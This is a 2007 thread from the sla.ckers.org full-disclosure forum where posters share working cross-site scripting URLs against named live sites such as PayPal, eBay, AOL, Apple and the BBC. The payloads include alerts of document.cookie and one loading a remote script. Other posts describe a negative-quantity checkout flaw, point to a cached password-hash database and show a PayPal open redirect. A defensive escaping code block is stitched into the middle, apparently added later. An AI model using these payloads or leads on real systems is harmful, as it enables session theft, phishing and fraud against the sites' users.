Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 53 of 65
Re: So it begins
Posted by: Anonymous User
Date: September 10, 2007 10:20AM

@nav LOL check:
MZ82013 / Mozilla Sticker  qt: -90	$6.20	$-558.00
Free stuff my friends.

Re: So it begins
Posted by: Anonymous User
Date: September 11, 2007 09:40AM

A reader from my webzine gave me this:

http://jetli.com/index.php?l=%22%3E%3Cscript%3Ealert(%22uh%20OEZ%20JAVASCRIPT!%22)%3C/script%3E%3Cimg%20src=%22

Am too lazy to report it.

Re: So it begins
Posted by: The-Wildcat
Date: September 11, 2007 10:14AM

http://www.blog.de/login.php?login=%22%3E%3Cscript%3Ealert('omg');%3C/script%3E
http://evil.hackademix.net/name.xss/***http://www.blog.de/srv/domains/search.php?domain_name=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3C%2F%73%63%72%69%70%74%3E***content,post
http://evil.hackademix.net/name.xss/***http://www.blog.de/srv/company/company.php?p=contact&action=send&name=%22%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%27%6A%61%76%61%73%63%72%69%70%74%3A%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%27%22%20***content,post

Re: So it begins
Posted by: xenoglaux
Date: September 11, 2007 02:11PM

Password database for OK Magazine, anyone?

(It's not available on their site anymore, but good old Google cache has it.)

http://64.233.183.104/search?q=cache:xMmXUkOOqIYJ:www.ok-magazine.com/users/index/+5f4dcc3b5aa765d61d8327deb882cf99&hl=en&ct=clnk&cd=259&gl=uk&client=firefox-a

Note that the MD5 hash of "password" is 5f4dcc3b5aa765d61d8327deb882cf99 - hmmm...

Re: So it begins
Posted by: nav
Date: September 11, 2007 04:11PM

Ronald Wrote:
-------------------------------------------------------
> @nav LOL check:
>
> MZ82013 / Mozilla Sticker qt: -90 $6.20 $-558.00
>
> Free stuff my friends.


haha that's awesome, works for any item too. No check on negatives..

Re: So it begins
Posted by: krazl
Date: September 12, 2007 03:21AM

Need help again:

I need any expert here to find an XSS flaw in my friend's website, www.stonemaster.biz. Please full disclose here. Thx in advance

Another ones
Posted by: iota
Date: September 13, 2007 08:56AM

http://ak.flashmo.com/sec/advisories/blueshoes.org

Another ones
Posted by: iota
Date: September 13, 2007 09:09AM


Re: So it begins
Posted by: Spikeman
Date: September 13, 2007 09:04PM

http://www.soul-reply.net/tamashi/country.php?id=%3Cscript%20src=http://ckers.org/s%3E%3C/script%3E

Re: So it begins
Posted by: Ghozt
Date: September 14, 2007 09:14PM

https://domains.aol.com/personaldomain/app/openRegistration?domainName=%3Cscript%3Ealert(1)%3C/script%3E

- Ghozt

Re: So it begins
Posted by: nav
Date: September 15, 2007 07:16PM


Re: So it begins
Posted by: Spyware
Date: September 21, 2007 04:32PM

http://www.yourdailymedia.com/exit.php?url="><script>alert(1)</script>

My example fires twice, "<a href="%urlGET%" class="book">" and another echo (title).

Re: So it begins
Date: September 24, 2007 12:17PM

https://www.turnitin.com/password_reset1.asp?r=81.2867254709932&svr=4&lang=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&

Many professors require students to use this site to turn in assignments =o(

Re: So it begins
Posted by: krazl
Date: September 24, 2007 10:29PM

my first xss..

http://www.rpi2u.com/message.asp?message=<script>alert('xss')</script>

Re: So it begins
Posted by: krazl
Date: September 24, 2007 10:31PM

my first

http://www.rpi2u.com/message.asp?message=<script>alert('xss')</script>

Re: So it begins
Posted by: Gareth Heyes
Date: September 25, 2007 08:02AM

I don't normally submit XSS but my mate got a new job and left the company I am working at so I had to test his new company out....2 mins later:-

http://www.lightmaker.com/search?search=%22%3E+%3Cscript%3Ealert%281%29%3C%2Fscript%3E

I reported it, they didn't reply

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: So it begins
Posted by: Spyware
Date: September 27, 2007 12:55PM

http://search.nba.com/promosearch.cgi?sp_i=1&sp_q=%DE&sp_a=sp10033e5e&sp_advanced=&sp_m=0&sp_f=ISO-8859-1&sp_t=%22%3E%3Cscript%3Ealert('ping --> pong')%3C/script%3E

Fires 7 times.

Re: So it begins
Posted by: digi7al64
Date: October 02, 2007 12:15AM

http://visualbasic.about.com/gi/dynamic/offsite.htm?site=javascript:alert('xss');

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: nemessis
Date: October 02, 2007 12:24PM

groups.ebay.com/tags.jspa?tag="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>

Re: So it begins
Posted by: moe
Date: October 05, 2007 12:47PM

been watching this thread for a while; looks like some of the big networking guys are taking notice.

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://investor.cisco.com/phoenix.zhtml?c=81192%26p=irol-eventReminderSuccess&control_EventReminderEmailText=%22%3E%3Cscript%3Ealert(12345)%3C/script%3E - no longer works; haven't explored other vectors yet.

Re: So it begins
Posted by: digi7al64
Date: October 08, 2007 08:23PM

https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&sitedomain=my.aol.com&authLev=0&lang=en&locale=us&siteState=OrigUrl%3Dhttp%253A%252F%252Ffavorites.my.aol.com%252Fffclient%252Fwebroot%252F0.2.1%252Fsrc%252Fhtml%252FaddFeedDialog.html%253Furl%253Dhttp%25253A%252F%252Fwww.aisledash.com%252Frss.xml');alert('xss
http://beta.bordersstores.com/online/store/SearchResults?keyword=%22%2F%3E%3Cimg+src%3D%22ccx.gif%22+onerror%3D%22alert%28%27xss%27%29%3B%22+%2F%3E+&type=0&simple=1 << [how many millions have been spent building this piece of crap? Perhaps they should have left it to Amazon]

EDIT: If the devs from borders get to read this, please use what little skills you have and spend some time going over this thread and you will see that flagging the term '<script>' in user supplied data does not make you secure, it only makes you stupid.

btw:
you can use beta as an excuse, if you never planned for it then it is really only a patch hey? therefore I can only wonder how many other "patches" you would need to secure your customers.

http://www.news.com.au/ = http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://searchresults.news.com.au/servlet/Search&searchoption=yes&masthead=adelaidenow&queryterm=%22%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0 (interestingly they use Google custom search)

http://searchenginewatch.com/ = http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://searchenginewatch.com/showPage.html?page=sew_search_results&q=%22%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 6 time(s). Last edit at 10/09/2007 12:24AM by digi7al64.
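
The point made in the post above, that flagging `<script>` in user input does not stop the other payload shapes quoted in this thread, shown from the fixing side. This is an added example, not part of the original post and not code from any site named here; the function names and the link text are hypothetical, and the sample inputs are decoded from URLs already on this page.

```javascript
// Constructed samples: decoded payload shapes already quoted in this thread.
const samples = [
  `"/><img src="ccx.gif" onerror="alert('xss');" />`, // search keyword value
  `javascript:alert('xss');`,                          // url= / site= parameter
  `"><script>alert(1)</script>`,                       // classic attribute break-out
];

// The approach criticised above: reject input only if it contains "<script>".
function naiveFilterAllows(input) {
  return !/<script>/i.test(input);
}

// Encode for HTML text and quoted-attribute contexts, so the value can never
// close the attribute or open a new tag, whatever it contains.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'`]/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#39;', '`': '&#96;',
  }[c]));
}

// Values placed in href/src need more than encoding: parse the URL, allow
// only http(s), then encode. Parsing (not a regex) also normalises leading
// whitespace and embedded tabs in the scheme.
function safeHref(raw, fallback = '#') {
  let u;
  try { u = new URL(String(raw).trim()); } catch { return fallback; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return fallback;
  return escapeHtml(u.href);
}

// Hypothetical templates for the two reflection contexts seen in the thread.
function renderSearchBox(keyword) {
  return `<input name="keyword" value="${escapeHtml(keyword)}">`;
}
function renderExitLink(urlParam) {
  return `<a href="${safeHref(urlParam)}" class="book">continue</a>`;
}

for (const s of samples) {
  console.log(naiveFilterAllows(s) ? 'filter ALLOWS ' : 'filter blocks ', s);
  console.log('  ', renderSearchBox(s));
  console.log('  ', renderExitLink(s));
}
```

The scheme check stops `javascript:` links but not redirects to arbitrary hosts; a redirect parameter also needs a host allowlist.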

Re: So it begins
Posted by: TarraDog52
Date: October 10, 2007 01:03AM

http://pus.lcs.mit.edu/cgi-bin/scigen.cgi?author=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Re: So it begins
Posted by: tx
Date: October 12, 2007 10:53PM

https://officialsecureinternet.com/shop/product_info.php?products_id=49&osCsid=%22--%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%20%20%29%3B%3C/script%3E%5D%21%3E%3C%21%5B lol

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/12/2007 10:54PM by tx.

Re: So it begins
Posted by: Gareth Heyes
Date: October 18, 2007 10:29AM

bbc lol:-
http://www.bbc.co.uk/cgi-bin/education/betsie/parser.pl/0005/www.google.com<iframe%20onload=alert%281%29

Ronald has also found this hole as well! I didn't steal his work honest! How easy is it to find these holes on major sites lol.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 10/19/2007 06:29AM by Gareth Heyes.

Re: So it begins
Posted by: digi7al64
Date: October 23, 2007 01:03AM

http://www.sap.info/index.php4?ACTION=noframe&url=javascript:alert('xss');

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: nemessis
Date: October 26, 2007 08:30PM

http://livechat.ebay.com/Chat/IVR/thankyou2.jsp?Chat_ID=&Chat_Queue=&CSR_Name=&Customer_Email=%22%3E%3Cscript%3Ealert(/Nemessis-WWW.RSTZONE.ORG/)%3C/script%3E

Re: So it begins
Posted by: zwerg
Date: October 30, 2007 04:28PM

Is this starting to get ridiculous? I posted a couple of months back, but it still only takes me about 5 minutes looking for XSS to find them. Here are a couple I have stumbled across just today.

NFL
http://www.nflshop.com/search/noResults.jsp?kw=%3Cscript%3Ealert('xss')%3C/script%3E

MLS (Major League Soccer)
http://web.mlsnet.com/search.do?query=%3Cscript%3Ealert('xss')%3C/script%3E&x=0&y=0&ccontext=mls&cid=mls

Apple (Developer site) - This does filter single quotes, but that is easy to work around.
http://developer.apple.com/cgi-bin/search.pl?&q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&num=10&ie=utf8&oe=utf8&lr=lang_en&simp=1

Apple (Mailing lists) - Not filtered in the header, but easy to break out of using </title></head>
http://search.lists.apple.com/?q=test%22%3C%2Ftitle%3E%3C%2Fhead%3E%3Cbody+onload%3D%22alert%28%27xss%27%29%22%3E&cmd=Search%21&form=extended&m=all&ps=10&fmt=long&wm=wrd&wf=2221&sp=1&ul=

--kz



Edited 1 time(s). Last edit at 10/30/2007 04:39PM by zwerg.

Re: So it begins
Posted by: nemessis
Date: October 31, 2007 09:14PM

crmgateway.paypal.com/payflow/cgi-bin/mail_pcancellation.pl?host=remote&processing=Yes&partner_login="><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>

Re: So it begins
Posted by: Anonymous User
Date: November 01, 2007 04:37AM

Very nice... it was worth a blog post~!

Re: So it begins
Posted by: nemessis
Date: November 02, 2007 07:59PM

PayPal again

Alert version

https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&uid=&campaign_id=604&offer_id=775&landing_url=javascript:alert('Nemessis-CLICK-THE-LINK-(HERE)-IF-YOU-HAVE-FIREFOX')

Click on "here" (only firefox users)

-----------------------------------------------------

Redirect version:

https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&uid=&campaign_id=604&offer_id=775&landing_url=http://ha.ckers.org
